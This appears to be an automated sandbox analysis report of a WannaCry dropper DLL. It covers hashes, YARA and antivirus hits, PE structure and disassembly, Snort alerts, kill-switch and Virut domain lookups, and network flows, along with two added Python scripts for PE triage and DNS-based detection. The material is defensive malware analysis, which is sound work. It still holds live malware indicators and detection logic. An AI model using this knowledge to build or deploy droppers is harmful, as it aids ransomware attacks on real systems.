                  Entropy (8bit):0.25073978672606645
                  Encrypted:false
                  SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                  MD5:A75B0FD36077AACEAFF0E9E87AB6C7F2
                  SHA1:758E164C2E346E5351146BC913A07E655E042A46
                  SHA-256:F1D3AACF8A188127DDEF3CC8E2C1BA0D61D2E12AF86C714B52F93F3668991E3D
                  SHA-512:9D2E5D160E3A90ED5B98E210F0B2ABC481FBE281353C91DACA70766A62CFB04412B83AF6F1264A3EA751406B604AA0D5CBD8CAFC7C1700E42F3A2C69C8AC9BF5
                  Malicious:false
                  Reputation:unknown
                  Preview:.- ... ................e.f.3...w........................&..........w..$'...zm.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................m.$'...z..................\.3.$'...z..........................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\svchost.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):55
                  Entropy (8bit):4.306461250274409
                  Encrypted:false
                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                  Malicious:false
                  Reputation:unknown
                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                  Process:C:\Windows\SysWOW64\rundll32.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3751936
                  Entropy (8bit):6.541158616335863
                  Encrypted:false
                  SSDEEP:49152:OnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAZ:6DqPoBhz1aRxcSUDk36SA
                  MD5:C69A376D234A2990509A077940306C82
                  SHA1:9862B3CDC643D19E2A5AAEF792B6D8D465B3FFEA
                  SHA-256:D30E4F4FE62F89E16EF6DB08CAA242C104BD7801C8141A8C4F9FD83AEA2880C1
                  SHA-512:F42820D150EA7032940AB8BD280E47BA2968D971D1F7E67A7CDF23D36ADB8E1554E1B641221DD8E164BED74F84E607E28955437374606C300F3099FDD286236E
                  Malicious:true
                  Yara Hits:
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 90%, Browse
                  • Antivirus: Metadefender, Detection: 83%, Browse
                  • Antivirus: ReversingLabs, Detection: 98%
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=.A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L......6.....................08...................@.......................... g......................................................1.. 6..........................................................................................................text.............................. ....rdata..............................@..@.data....H0......p..................@....rsrc.... 6...1.. 6.. ..............`...........................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\mssecsvc.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):3514368
                  Entropy (8bit):6.5250408221172975
                  Encrypted:false
                  SSDEEP:49152:nQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAL:QqPoBhz1aRxcSUDk36SA8
                  MD5:3233ACED9279EF54267C479BBA665B90
                  SHA1:0B2CC142386641901511269503CDF6F641FAD305
                  SHA-256:F60F8A6BCAF1384A0D6A76D3E88007A8604560B263D2B8AEEE06FD74C9EE5B3B
                  SHA-512:55F25C51FFB89D46F2A7D2ED9B67701E178BD68E74B71D757D5FA14BD9530A427104FC36116633033EAD762ECF7960AB96429F5B0A085A701001C6832BA4555E
                  Malicious:true
                  Yara Hits:
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 90%, Browse
                  • Antivirus: Metadefender, Detection: 85%, Browse
                  • Antivirus: ReversingLabs, Detection: 95%
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.05346827793727
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HFKDS6VcNO.dll
                  File size:5267459
                  MD5:a653c0208aa9acb903bdb441897f8874
                  SHA1:817cbd6c8cae90d80555e1935c41adb8bcb0ba7a
                  SHA256:757f15a84e4a94e139d44d03450241f161442785d216a6220c7332edcda79539
                  SHA512:406aac2830a886086246e214c82af8de0f1936977953f983c9c4b6a44083a9931c548429b9e927fb988c2c52da3c532fe6bc52c63e7bcb0a9b7c54d8abde484a
                  SSDEEP:49152:vnAQqMSPbcBVQej/1INRx+TSqTdX1HkQo6SAAZ:/DqPoBhz1aRxcSUDk36SA
                  TLSH:A436F601D2E51AA0DAF25EF7267ADB10833A6F45895BA66E1221500F0C77F1CDDE6F2C
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.r_9...9...9.......=...9...6.....A.:.......8.......8.......:...Rich9...........................PE..L...QW.Y...........!.......
                  Icon Hash:74f0e4ecccdce0e4
                  Entrypoint:0x100011e9
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  DLL Characteristics:
                  Time Stamp:0x59145751 [Thu May 11 12:21:37 2017 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:2e5708ae5fed0403e8117c645fb23e5b
                  Instruction
                  push ebp
                  mov ebp, esp
                  push ebx
                  mov ebx, dword ptr [ebp+08h]
                  push esi
                  mov esi, dword ptr [ebp+0Ch]
                  push edi
                  mov edi, dword ptr [ebp+10h]
                  test esi, esi
                  jne 00007F2E9498FBDBh
                  cmp dword ptr [10003140h], 00000000h
                  jmp 00007F2E9498FBF8h
                  cmp esi, 01h
                  je 00007F2E9498FBD7h
                  cmp esi, 02h
                  jne 00007F2E9498FBF4h
                  mov eax, dword ptr [10003150h]
                  test eax, eax
                  je 00007F2E9498FBDBh
                  push edi
                  push esi
                  push ebx
                  call eax
                  test eax, eax
                  je 00007F2E9498FBDEh
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498FAEAh
                  test eax, eax
                  jne 00007F2E9498FBD6h
                  xor eax, eax
                  jmp 00007F2E9498FC20h
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498F99Ch
                  cmp esi, 01h
                  mov dword ptr [ebp+0Ch], eax
                  jne 00007F2E9498FBDEh
                  test eax, eax
                  jne 00007F2E9498FC09h
                  push edi
                  push eax
                  push ebx
                  call 00007F2E9498FAC6h
                  test esi, esi
                  je 00007F2E9498FBD7h
                  cmp esi, 03h
                  jne 00007F2E9498FBF8h
                  push edi
                  push esi
                  push ebx
                  call 00007F2E9498FAB5h
                  test eax, eax
                  jne 00007F2E9498FBD5h
                  and dword ptr [ebp+0Ch], eax
                  cmp dword ptr [ebp+0Ch], 00000000h
                  je 00007F2E9498FBE3h
                  mov eax, dword ptr [10003150h]
                  test eax, eax
                  je 00007F2E9498FBDAh
                  push edi
                  push esi
                  push ebx
                  call eax
                  mov dword ptr [ebp+0Ch], eax
                  mov eax, dword ptr [ebp+0Ch]
                  pop edi
                  pop esi
                  pop ebx
                  pop ebp
                  retn 000Ch
                  jmp dword ptr [10002028h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  Programming Language:
                  • [ C ] VS98 (6.0) build 8168
                  • [C++] VS98 (6.0) build 8168
                  • [RES] VS98 (6.0) cvtres build 1720
                  • [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2190 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x203c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x500060 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x505000 | 0x5c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x28c | 0x1000 | False | 0.13037109375 | data | 1.4429971244731552 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x1d8 | 0x1000 | False | 0.072509765625 | data | 0.7346018133622799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x154 | 0x1000 | False | 0.016845703125 | data | 0.085238686413312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4000 | 0x500060 | 0x501000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x505000 | 0x2ac | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
W | 0x4060 | 0x500000 | data | English | United States
DLL | Import
KERNEL32.dll | CloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
MSVCRT.dll | free, _initterm, malloc, _adjust_fdiv, sprintf
Name | Ordinal | Address
PlayGame | 1 | 0x10001114
Language of compilation system | Country where language is spoken
English | United States
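The static tables above describe a thin loader: a .text section of 0x28c bytes, a single 0x500000-byte resource "W" at RVA 0x4060 that accounts for nearly the whole 5267459-byte file, and an import set (FindResourceA/LoadResource/LockResource/SizeofResource, CreateFileA/WriteFile, CreateProcessA) that is exactly what is needed to write an embedded payload to disk and start it, which matches the dropped-file entry showing rundll32.exe writing C:\Windows\mssecsvc.exe. The following script is an added example, not Joe Sandbox code: a pure-Python (struct only) section-table parser that raises those findings from the headers alone. The synthetic PE it builds is constructed here so the example runs offline; it copies the report's RVAs and timestamp but not the real size or contents, and the thresholds (a .text under 0x1000 bytes, a section holding 90% or more of the file) are assumptions.

```python
"""Section-table triage for a PE32 file, in pure Python (struct only).

Added example for this report, not Joe Sandbox code. It parses section headers
and raises the findings a reviewer takes from the static tables: a tiny .text,
a .rsrc holding almost the whole file, and an MZ/PE image inside that resource
section. build_synthetic_pe() constructs an offline stand-in that copies the
report's layout (.text at RVA 0x1000, .rsrc at 0x4000, payload at RVA 0x4060,
timestamp 0x59145751) at a fraction of the real size; it is not the sample.
"""
import hashlib
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"        # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """One dict per section header, with the raw bytes each header points at."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]      # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]      # COFF SizeOfOptionalHeader
    first = e_lfanew + 24 + opt_size                               # section headers follow the optional header
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER, pe, first + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "raw_size": raw_size,
                         "characteristics": chars, "data": pe[raw_ptr:raw_ptr + raw_size]})
    return sections


def find_embedded_pe(blob: bytes) -> list:
    """Offsets of MZ headers whose e_lfanew lands on a PE signature inside blob."""
    hits, pos = [], blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            if 0x40 <= lfanew < 0x1000 and blob[pos + lfanew:pos + lfanew + 4] == b"PE\0\0":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits


def triage(pe: bytes) -> dict:
    """Section findings of the kind the report's section and resource tables support."""
    sections, findings, total = parse_sections(pe), [], len(pe)
    for s in sections:
        s["entropy"] = shannon_entropy(s["data"])
        chars = s["characteristics"]
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: writable and executable")
        if s["name"] == ".text" and s["vsize"] < 0x1000:             # threshold is an assumption
            findings.append(f".text holds only {s['vsize']:#x} bytes of code")
        if s["raw_size"] * 100 // total >= 90:                        # threshold is an assumption
            findings.append(f"{s['name']}: {s['raw_size'] * 100 // total}% of the file")
        if s["name"] == ".rsrc":
            for off in find_embedded_pe(s["data"]):
                findings.append(f".rsrc: embedded PE at RVA {s['vaddr'] + off:#x}")
    return {"sections": sections, "findings": findings}


def build_synthetic_pe(payload_size: int = 0x20000) -> bytes:
    """Constructed PE32 DLL mirroring the report's layout; not the analysed sample."""
    text_raw = b"\x55\x8b\xec\x53" + b"\0" * (0x1000 - 4)       # push ebp; mov ebp,esp; push ebx; padding
    stub = bytearray(b"MZ" + b"\0" * 0x3E)                       # fake dropped image: MZ header ...
    struct.pack_into("<I", stub, 0x3C, 0x40)                     # ... whose e_lfanew points at "PE\0\0"
    stub += b"PE\0\0" + b"\0" * 20
    payload = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest()
                       for i in range(payload_size // 32))       # deterministic high-entropy filler
    rsrc_raw = b"\0" * 0x60 + bytes(stub) + payload              # resource body begins at RVA 0x4060
    rsrc_raw += b"\0" * (-len(rsrc_raw) % 0x1000)                # file-alignment padding, as in the report
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x59145751, 0, 0, 0xE0, 0x2102)  # i386, 2 sections, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<III", opt, 28, 0x10000000, 0x1000, 0x1000)  # ImageBase, section/file alignment

    def hdr(name, vsize, vaddr, raw_size, raw_ptr, chars):
        return struct.pack(SECTION_HEADER, name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + hdr(b".text", 0x28C, 0x1000, len(text_raw), 0x1000, 0x60000020)
               + hdr(b".rsrc", 0x60 + len(stub) + len(payload), 0x4000, len(rsrc_raw), 0x2000, 0x40000040))
    return headers + b"\0" * (0x1000 - len(headers)) + text_raw + rsrc_raw


if __name__ == "__main__":
    for line in triage(build_synthetic_pe())["findings"]:
        print(line)
```

Run it against the real sample with `triage(open(path, "rb").read())` and the embedded-PE scan will report where inside .rsrc the dropped image starts. One caveat before treating the resource as the payload: the report lists resource "W" as 0x500000 (5242880) bytes while the dropped mssecsvc.exe is 3751936 bytes, so the loader does not simply write the resource out verbatim, and the resource's hash should not be expected to equal the dropped file's SHA-256 above.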
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/20/22-19:38:14.180756 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49722 | 80 | 192.168.2.7 | 104.16.173.80
07/20/22-19:40:39.364164 | UDP | 2024281 | ET TROJAN Known Hostile Domain ant.trenz .pl Lookup | 58715 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:42:02.043613 | UDP | 2012730 | ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup | 58838 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:42:33.215516 | UDP | 2024281 | ET TROJAN Known Hostile Domain ant.trenz .pl Lookup | 52925 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:41:32.051223 | UDP | 2811577 | ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) | 53 | 49495 | 8.8.8.8 | 192.168.2.7
07/20/22-19:40:36.366445 | TCP | 2024298 | ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 | 49729 | 80 | 192.168.2.7 | 104.16.173.80
07/20/22-19:40:36.279977 | UDP | 2024291 | ET TROJAN Possible WannaCry DNS Lookup 1 | 60996 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:41:09.165765 | UDP | 2811577 | ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) | 53 | 64618 | 8.8.8.8 | 192.168.2.7
07/20/22-19:38:14.102838 | UDP | 2024291 | ET TROJAN Possible WannaCry DNS Lookup 1 | 57859 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:40:08.155803 | UDP | 2012730 | ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup | 63557 | 53 | 192.168.2.7 | 8.8.8.8
07/20/22-19:38:14.222408 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49722 | 104.16.173.80 | 192.168.2.7
07/20/22-19:40:36.404548 | TCP | 2031515 | ET TROJAN Known Sinkhole Response Kryptos Logic | 80 | 49729 | 104.16.173.80 | 192.168.2.7
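The Snort alerts above and the DNS query/answer tables further down record three things worth re-deriving from DNS telemetry alone: the lookup of the WannaCry kill-switch domain www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com (answered here with 104.16.173.80 and 104.17.244.81, after which the sinkhole replied over HTTP), lookups of the Virut-associated domains ant.trenz.pl and ilo.brenz.pl, and a burst of NXDOMAIN answers for six-letter .com names that the ETPRO "Possible Virut DGA" alert fired on. The script below is an added example, not Joe Sandbox or Emerging Threats code. SAMPLE_LOG is constructed from the DNS answer rows in this report plus two made-up rows (an ant.trenz.pl answer and a benign example.com lookup) so that it runs offline; the DGA heuristic (six lowercase letters plus .com, eight or more NXDOMAIN answers within ten seconds) is tuned to the names seen here and is an assumption, not a published rule.

```python
"""DNS-answer triage for the indicators this report records.

Added example for this page, not Joe Sandbox or Emerging Threats code. It
re-derives three of the Snort alerts from DNS responses: the WannaCry
kill-switch lookup, the Virut-associated hostile domains, and a burst of
NXDOMAIN answers for six-letter .com names. SAMPLE_LOG is constructed from the
report's DNS tables plus two made-up rows; the DGA thresholds are assumptions.
Columns: timestamp | src | dst | transaction id | reply code | name | address.
"""
import re
from collections import deque
from datetime import datetime, timedelta

KILLSWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
HOSTILE_DOMAINS = {"ant.trenz.pl", "ilo.brenz.pl"}      # from the Snort alerts in this report
DGA_NAME = re.compile(r"^[a-z]{6}\.com$")               # shape of the NXDOMAIN names here (assumption)
DGA_WINDOW = timedelta(seconds=10)                      # assumption
DGA_THRESHOLD = 8                                       # assumption
NXDOMAIN = "Name error (3)"

SAMPLE_LOG = """\
Jul 20, 2022 19:38:14.126581907 CEST | 8.8.8.8 | 192.168.2.7 | 0xda4 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80
Jul 20, 2022 19:38:14.126581907 CEST | 8.8.8.8 | 192.168.2.7 | 0xda4 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.17.244.81
Jul 20, 2022 19:40:36.303530931 CEST | 8.8.8.8 | 192.168.2.7 | 0x42f7 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80
Jul 20, 2022 19:40:36.303530931 CEST | 8.8.8.8 | 192.168.2.7 | 0x42f7 | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.17.244.81
Jul 20, 2022 19:40:39.400000000 CEST | 8.8.8.8 | 192.168.2.7 | 0x1111 | Name error (3) | ant.trenz.pl | none
Jul 20, 2022 19:40:50.000000000 CEST | 8.8.8.8 | 192.168.2.7 | 0x2222 | No error (0) | example.com | 198.51.100.10
Jul 20, 2022 19:41:08.202572107 CEST | 8.8.8.8 | 192.168.2.7 | 0x673c | Name error (3) | tlmowf.com | none
Jul 20, 2022 19:41:08.301064968 CEST | 8.8.8.8 | 192.168.2.7 | 0xc0b2 | Name error (3) | lyeaew.com | none
Jul 20, 2022 19:41:08.374860048 CEST | 8.8.8.8 | 192.168.2.7 | 0xfc5 | Name error (3) | kqurib.com | none
Jul 20, 2022 19:41:09.083990097 CEST | 8.8.8.8 | 192.168.2.7 | 0x1d9e | Name error (3) | pqjxkf.com | none
Jul 20, 2022 19:41:09.165765047 CEST | 8.8.8.8 | 192.168.2.7 | 0x2a89 | Name error (3) | omxsxm.com | none
Jul 20, 2022 19:41:09.199461937 CEST | 8.8.8.8 | 192.168.2.7 | 0xb170 | Name error (3) | yurwei.com | none
Jul 20, 2022 19:41:09.284782887 CEST | 8.8.8.8 | 192.168.2.7 | 0x1756 | Name error (3) | vpqnxj.com | none
Jul 20, 2022 19:41:09.324182034 CEST | 8.8.8.8 | 192.168.2.7 | 0x4ab9 | Name error (3) | cxfuoy.com | none
Jul 20, 2022 19:41:09.389641047 CEST | 8.8.8.8 | 192.168.2.7 | 0xbab8 | Name error (3) | iuwutz.com | none
Jul 20, 2022 19:41:09.483437061 CEST | 8.8.8.8 | 192.168.2.7 | 0xc036 | Name error (3) | iodilu.com | none
Jul 20, 2022 19:41:09.520129919 CEST | 8.8.8.8 | 192.168.2.7 | 0x477f | Name error (3) | eekkiz.com | none
Jul 20, 2022 19:41:09.595463991 CEST | 8.8.8.8 | 192.168.2.7 | 0x9878 | Name error (3) | asesdh.com | none
"""


def parse_timestamp(text: str) -> datetime:
    """'Jul 20, 2022 19:41:08.202572107 CEST' -> datetime; nanoseconds cut to microseconds."""
    head, frac = text.replace(" CEST", "").rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_log(text: str) -> list:
    """Split the pipe-delimited answer rows into records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, txid, rcode, name, address = [f.strip() for f in line.split("|")]
        records.append({"ts": parse_timestamp(ts), "src": src, "dst": dst, "txid": txid,
                        "rcode": rcode, "name": name.lower().rstrip("."), "address": address})
    return records


def detect(records: list) -> list:
    """One alert per kill-switch/hostile transaction, one per NXDOMAIN burst."""
    alerts, seen, window = [], set(), deque()
    for r in sorted(records, key=lambda rec: rec["ts"]):
        key = (r["txid"], r["name"])                     # several A records share one transaction
        if r["name"] == KILLSWITCH_DOMAIN and key not in seen:
            seen.add(key)
            alerts.append({"ts": r["ts"], "rule": "wannacry-killswitch-lookup", "name": r["name"],
                           "detail": f"answered with {r['address']}"})
        elif r["name"] in HOSTILE_DOMAINS and key not in seen:
            seen.add(key)
            alerts.append({"ts": r["ts"], "rule": "known-hostile-domain", "name": r["name"],
                           "detail": r["rcode"]})
        elif r["rcode"] == NXDOMAIN and DGA_NAME.match(r["name"]):
            window.append(r)
            while r["ts"] - window[0]["ts"] > DGA_WINDOW:  # drop NXDOMAINs older than the window
                window.popleft()
            if len(window) == DGA_THRESHOLD:             # fires once per burst, on the crossing
                alerts.append({"ts": r["ts"], "rule": "dga-nxdomain-burst", "name": r["name"],
                               "detail": ", ".join(w["name"] for w in window)})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_log(SAMPLE_LOG)):
        print(a["ts"], a["rule"], a["name"], a["detail"])
```

Two points when turning this into production detection. A kill-switch hit means a WannaCry sample executed on the querying host; in WannaCry a successful connection to that domain makes the sample exit before its SMB propagation routine runs, which is why this run shows only the sinkhole HTTP exchange and no lateral traffic, so the alert should be triaged as execution, not as contained. And the addresses returned here (104.16.173.80, 104.17.244.81, in the CLOUDFLARENETUS context above) belong to a CDN in front of the sinkhole; match on the domain and on the "Known Sinkhole Response" signature, not on those IPs as standalone indicators.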
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2022 19:38:14.163525105 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:38:14.179990053 CEST | 80 | 49722 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:38:14.180095911 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:38:14.180756092 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:38:14.197451115 CEST | 80 | 49722 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:38:14.222408056 CEST | 80 | 49722 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:38:14.222538948 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:38:14.222773075 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:38:14.239343882 CEST | 80 | 49722 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:38:14.440079927 CEST | 80 | 49722 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:38:14.440179110 CEST | 49722 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.348706961 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.365447044 CEST | 80 | 49729 | 104.16.173.80 | 192.168.2.7
Jul 20, 2022 19:40:36.365560055 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.366445065 CEST | 49729 | 80 | 192.168.2.7 | 104.16.173.80
Jul 20, 2022 19:40:36.384880066 CEST | 80 | 49729 | 104.16.173.80 | 192.168.2.7
